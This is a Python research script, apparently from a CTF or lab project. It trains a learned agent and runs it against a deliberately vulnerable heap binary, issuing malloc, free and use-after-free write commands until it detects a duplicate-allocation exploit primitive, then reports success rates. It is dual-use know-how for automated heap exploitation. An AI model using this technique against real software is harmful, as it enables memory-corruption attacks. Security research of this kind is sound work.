File size: 10,807 Bytes
22374d1
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
#!/usr/bin/env python3
"""
real_binary_bridge.py - Connect TRM agent to a real binary via LD_PRELOAD harness.

Architecture:
  1. Launch vuln_heap binary with heapgrid_harness.so (LD_PRELOAD)
  2. Agent reads heap state from harness dump file after each command
  3. Agent predicts next operation type via TRM
  4. Translates to menu commands and sends via stdin pipe
  5. Repeats until exploit primitive detected or max steps

This is the simulator-to-reality transfer test.
"""

import subprocess
import os
import sys
import json
import time
import random
import tempfile
import numpy as np
import torch
import torch.nn.functional as F
from pathlib import Path

ROOT = Path(__file__).resolve().parent.parent
sys.path.insert(0, str(ROOT / "agent"))
sys.path.insert(0, str(ROOT / "simulator"))
sys.path.insert(0, str(ROOT / "model"))
sys.path.insert(0, str(ROOT / "dataset"))

from simple_agent import SimpleHeapTRM, OP_MALLOC, OP_FREE, OP_WRITE_FREED, SIZES
from dataset_gen import state_to_grid, load_dump

# Target CTF binary; used as RealBinaryEnv's default ``binary`` argument.
BINARY = ROOT / "ctf" / "vuln_heap"
# Harness shared object injected into BINARY via LD_PRELOAD; RealBinaryEnv tells
# it where to write heap snapshots through the HEAPGRID_OUT environment variable.
HARNESS = ROOT / "harness" / "heapgrid_harness.so"


class RealBinaryEnv:
    """Drive a real binary under the heap harness and expose grid observations.

    The binary is started with ``LD_PRELOAD`` set to the harness and with
    ``HEAPGRID_OUT`` naming a temporary JSONL file; heap snapshots are read
    back from that file.  Menu commands are written to the binary's stdin.
    The binary's menu output is not parsed, so this class keeps its own
    record of which slots it has allocated and freed.
    """

    def __init__(self, binary=BINARY, harness=HARNESS):
        self.binary = str(binary)
        self.harness = str(harness)
        self.proc = None
        self.dump_file = None
        # Assigned by start(); initialised here so stop() and
        # get_heap_state() are safe to call before start().
        self.dump_path = None
        self.slots = {}         # slot -> True while allocated, False after free
        self.slot_sizes = {}    # slot -> size passed to the most recent malloc
        self.commands_sent = []
        self._last_dump_lines = 0  # NOTE(review): not read anywhere in this file

    def start(self):
        """Launch the binary with the harness preloaded.

        Creates a fresh temporary dump file, spawns the process and resets the
        slot bookkeeping.  The child's stdout/stderr are sent to /dev/null:
        nothing here reads them, and an unread PIPE can fill up and stall the
        child (see the ``subprocess`` docs on pipe-buffer deadlocks).

        Raises:
            OSError: if the binary cannot be executed; the temporary dump
                file is removed before re-raising.
        """
        self.dump_file = tempfile.NamedTemporaryFile(
            suffix=".jsonl", delete=False, mode="w"
        )
        self.dump_path = self.dump_file.name
        self.dump_file.close()

        env = os.environ.copy()
        env["LD_PRELOAD"] = self.harness
        env["HEAPGRID_OUT"] = self.dump_path

        try:
            self.proc = subprocess.Popen(
                [self.binary],
                stdin=subprocess.PIPE,
                stdout=subprocess.DEVNULL,
                stderr=subprocess.DEVNULL,
                env=env,
            )
        except OSError:
            # Don't leave the temp file behind when the launch fails.
            os.unlink(self.dump_path)
            self.dump_path = None
            raise
        self.slots = {}
        self.slot_sizes = {}
        self.commands_sent = []
        self._last_dump_lines = 0

    def send_command(self, cmd: str):
        """Write one newline-terminated menu command to the binary's stdin.

        The command is recorded in ``commands_sent`` only after the write and
        flush succeed.  A short sleep follows to let the binary process it.

        Raises:
            OSError: (typically BrokenPipeError) if the binary has exited and
                no longer reads its stdin.
        """
        self.proc.stdin.write((cmd + "\n").encode())
        self.proc.stdin.flush()
        self.commands_sent.append(cmd)
        time.sleep(0.01)  # let the binary process

    def do_malloc(self, slot: int, size: int):
        """Menu option 1: allocate a note of ``size`` bytes in ``slot``."""
        self.send_command(f"1 {slot} {size}")
        self.slots[slot] = True
        self.slot_sizes[slot] = size

    def do_free(self, slot: int):
        """Menu option 4: delete the note in ``slot``."""
        self.send_command(f"4 {slot}")
        # The binary's pointer is not cleared (UAF), so the slot stays tracked
        # but is marked freed rather than removed.
        self.slots[slot] = False

    def do_edit_uaf(self, slot: int, data_hex: str):
        """Menu option 2: edit a note (also works on freed chunks = UAF)."""
        self.send_command(f"2 {slot} {data_hex}")

    def do_show(self, slot: int):
        """Menu option 3: show a note (its output is discarded)."""
        self.send_command(f"3 {slot}")

    def do_exit(self):
        """Menu option 5: ask the binary to exit."""
        self.send_command("5")

    def get_heap_state(self) -> "dict | None":
        """Return the most recent complete heap snapshot from the dump, or None.

        Lines are scanned from the end so that a trailing line the harness is
        still writing (and which therefore fails to parse) falls back to the
        previous complete snapshot instead of yielding None.  Returns None
        when there is no dump file, it cannot be read, or it holds no
        parseable line.
        """
        if not self.dump_path:
            return None
        try:
            with open(self.dump_path, "r") as f:
                lines = f.readlines()
        except (OSError, UnicodeDecodeError):
            return None
        for raw in reversed(lines):
            line = raw.strip()
            if not line:
                continue
            try:
                return json.loads(line)
            except json.JSONDecodeError:
                continue  # partial/torn write: try the previous snapshot
        return None

    def get_grid(self) -> np.ndarray:
        """Get the current heap state as a 32x16 int64 grid (zeros if unavailable)."""
        state = self.get_heap_state()
        if state is None:
            return np.zeros((32, 16), dtype=np.int64)
        return state_to_grid(state)

    def get_all_states(self) -> list:
        """Read every heap state in the dump; best-effort, [] on any failure."""
        try:
            return load_dump(Path(self.dump_path))
        except Exception:
            # Deliberately best-effort: load_dump's failure modes aren't
            # visible from here.  NOTE(review): consider narrowing.
            return []

    def check_duplicate_alloc(self) -> bool:
        """Return True if two allocated chunks in the latest snapshot share an address.

        Only chunks with ``state == 1`` (allocated) and a known ``addr`` are
        considered; a missing address can't demonstrate an overlap.
        """
        state = self.get_heap_state()
        if state is None:
            return False

        seen = set()
        for chunk in state.get("chunks", []):
            if chunk.get("state") != 1:  # only allocated chunks
                continue
            addr = chunk.get("addr")
            if addr is None:
                continue
            if addr in seen:
                return True
            seen.add(addr)
        return False

    def stop(self):
        """Shut the binary down and delete the dump file.

        Closing stdin gives the binary EOF and up to 2 s to exit; if that
        fails or times out it is killed and reaped.  Safe to call more than
        once and before start().
        """
        if self.proc:
            try:
                self.proc.stdin.close()
                self.proc.wait(timeout=2)
            except (OSError, subprocess.TimeoutExpired):
                self.proc.kill()
                # Reap the killed child so it does not linger as a zombie.
                self.proc.wait()
        if self.dump_path and os.path.exists(self.dump_path):
            os.unlink(self.dump_path)


# Labels for the model's op indices, recorded in result["op_sequence"].
# NOTE(review): assumes OP_MALLOC/OP_FREE/OP_WRITE_FREED are 0/1/2 and that
# index 3 is a no-op; confirm against simple_agent.
_OP_LABELS = ("malloc", "free", "write_freed", "noop")


def _apply_op(env, op, step, verbose):
    """Translate one predicted op into menu command(s); return True if one was sent."""
    if op == OP_MALLOC:
        # Never-used and already-freed slots are both eligible for (re)allocation.
        candidates = [s for s in range(16) if not env.slots.get(s)]
        if not candidates:
            return False
        slot = random.choice(candidates[:8])
        size = random.choice(SIZES)
        env.do_malloc(slot, size)
        if verbose:
            print(f"  Step {step}: MALLOC slot={slot} size={hex(size)}")
        return True

    if op == OP_FREE:
        allocated = [s for s, live in env.slots.items() if live]
        if not allocated:
            return False
        slot = random.choice(allocated)
        env.do_free(slot)
        if verbose:
            print(f"  Step {step}: FREE slot={slot}")
        return True

    if op == OP_WRITE_FREED:
        freed = [s for s, live in env.slots.items() if not live]
        # Require a freed source plus at least one other tracked slot; the
        # payload itself does not depend on which other slot that is.
        if not freed or len(env.slots) < 2:
            return False
        src = random.choice(freed)
        # The target's real address is unknown, so write a recognisable
        # 8-byte pattern (0x4141414141414141) intended to land where the
        # freed chunk's fd pointer lives.
        env.do_edit_uaf(src, "41" * 8)
        if verbose:
            print(f"  Step {step}: WRITE_FREED slot={src} (UAF edit)")
        return True

    return False


def run_agent_on_real_binary(
    model: SimpleHeapTRM,
    max_steps: int = 20,
    temperature: float = 0.3,
    verbose: bool = True,
) -> dict:
    """
    Run the TRM agent against the real vuln_heap binary.

    Each step reads the latest heap grid and picks an op from the model
    (argmax when ``temperature == 0``, otherwise softmax sampling). It then
    translates the op into menu commands and, if a command was sent, checks
    the dump for a duplicate allocation.

    Returns a dict with:
        achieved:    True if check_duplicate_alloc() fired.
        steps:       step number at success, otherwise max_steps.
        commands:    menu commands sent (excluding the final exit command).
        op_sequence: label of every predicted op, including skipped ones.
        crashed:     True if the binary stopped accepting input mid-run.

    The binary process and its dump file are cleaned up even if an error
    interrupts the run.
    """
    env = RealBinaryEnv()
    env.start()

    result = {
        "achieved": False,
        "steps": 0,
        "commands": [],
        "op_sequence": [],
        "crashed": False,
    }

    try:
        # Give the binary a moment to initialize
        time.sleep(0.05)
        model.eval()

        for step in range(max_steps):
            grid = env.get_grid()

            # TRM predicts operation type
            x = torch.from_numpy(grid).long().unsqueeze(0)
            with torch.no_grad():
                logits = model(x)
                if temperature == 0:
                    op = logits.argmax(1).item()
                else:
                    probs = F.softmax(logits / temperature, dim=1)
                    op = torch.multinomial(probs, 1).item()

            label = _OP_LABELS[op]
            result["op_sequence"].append(label)

            try:
                success = _apply_op(env, op, step, verbose)
            except BrokenPipeError:
                # The binary no longer reads stdin (it exited or crashed), so
                # no further command can reach it.
                result["crashed"] = True
                if verbose:
                    print(f"  Step {step}: {label.upper()} - binary exited, stopping")
                break

            if not success:
                if verbose:
                    print(f"  Step {step}: {label.upper()} - skipped (no valid target)")
                continue

            time.sleep(0.02)  # let harness write

            if env.check_duplicate_alloc():
                result["achieved"] = True
                result["steps"] = step + 1
                if verbose:
                    print(f"  ** EXPLOIT PRIMITIVE ACHIEVED at step {step + 1}! **")
                break
    finally:
        # Snapshot before do_exit() so the trailing exit command is excluded.
        result["commands"] = env.commands_sent.copy()
        try:
            env.do_exit()
        except OSError:
            pass  # binary already gone; there is nothing left to tell it
        env.stop()

    if not result["achieved"]:
        result["steps"] = max_steps

    return result


def main(
    n_trials: int = 50,
    n_bo_trials: int = 20,
    bo_k: int = 10,
    max_steps: int = 20,
):
    """Train a fresh agent on simulator demos, then evaluate it on the real binary.

    Two evaluations are printed:
      * ``n_trials`` single verbose runs at temperature 0.3, with the success
        rate and step statistics of the successful runs;
      * ``n_bo_trials`` best-of-``bo_k`` trials at temperature 0.5, where a
        trial counts as found if any of its ``bo_k`` runs succeeds.

    Every run is capped at ``max_steps``.  The defaults reproduce the original
    fixed setup (50 trials, 20 best-of-10 trials, 20 steps).
    """
    # No checkpoint is loaded: the model is trained from scratch on
    # simulator demonstrations every run (same recipe as simple_agent.py).
    print("=== Loading trained model ===")
    model = SimpleHeapTRM(hidden_dim=128, n_outer=2, n_inner=3)

    from simple_agent import generate_demos, train
    X, y = generate_demos(300)
    print(f"Training on {len(X)} demo samples...")
    train(model, X, y, epochs=100, lr=1e-3)

    # Test on real binary
    print("\n=== Testing on real vuln_heap binary ===")

    n_achieved = 0
    all_steps = []

    for trial in range(n_trials):
        print(f"\n--- Trial {trial + 1}/{n_trials} ---")
        result = run_agent_on_real_binary(
            model, max_steps=max_steps, temperature=0.3, verbose=True)

        if result["achieved"]:
            n_achieved += 1
            all_steps.append(result["steps"])
            print(f"  SUCCESS in {result['steps']} steps")
            print(f"  Op sequence: {' -> '.join(result['op_sequence'][:result['steps']])}")
        else:
            print(f"  FAILED after {result['steps']} steps")

    rule = "=" * 60
    print(f"\n{rule}")
    print("REAL BINARY RESULTS")
    print(rule)
    rate = n_achieved / n_trials * 100 if n_trials else 0.0
    print(f"Success rate: {n_achieved}/{n_trials} ({rate:.0f}%)")
    if all_steps:
        print(f"Avg steps when successful: {np.mean(all_steps):.1f}")
        print(f"Min steps: {min(all_steps)}, Max steps: {max(all_steps)}")

    # Best-of-k: a trial succeeds if any of its k independent runs does.
    print(f"\n=== Best-of-{bo_k} evaluation ({n_bo_trials} trials) ===")
    n_found = 0
    for trial in range(n_bo_trials):
        # any() short-circuits, so attempts stop at the first success.
        found = any(
            run_agent_on_real_binary(
                model, max_steps=max_steps, temperature=0.5, verbose=False
            )["achieved"]
            for _ in range(bo_k)
        )
        n_found += found
        print(f"  Trial {trial+1}: {'FOUND' if found else 'MISS'}")

    bo_rate = n_found / n_bo_trials * 100 if n_bo_trials else 0.0
    print(f"\nBest-of-{bo_k} success: {n_found}/{n_bo_trials} ({bo_rate:.0f}%)")


# Script entry point: train the agent, then evaluate it against the real binary.
if __name__ == "__main__":
    main()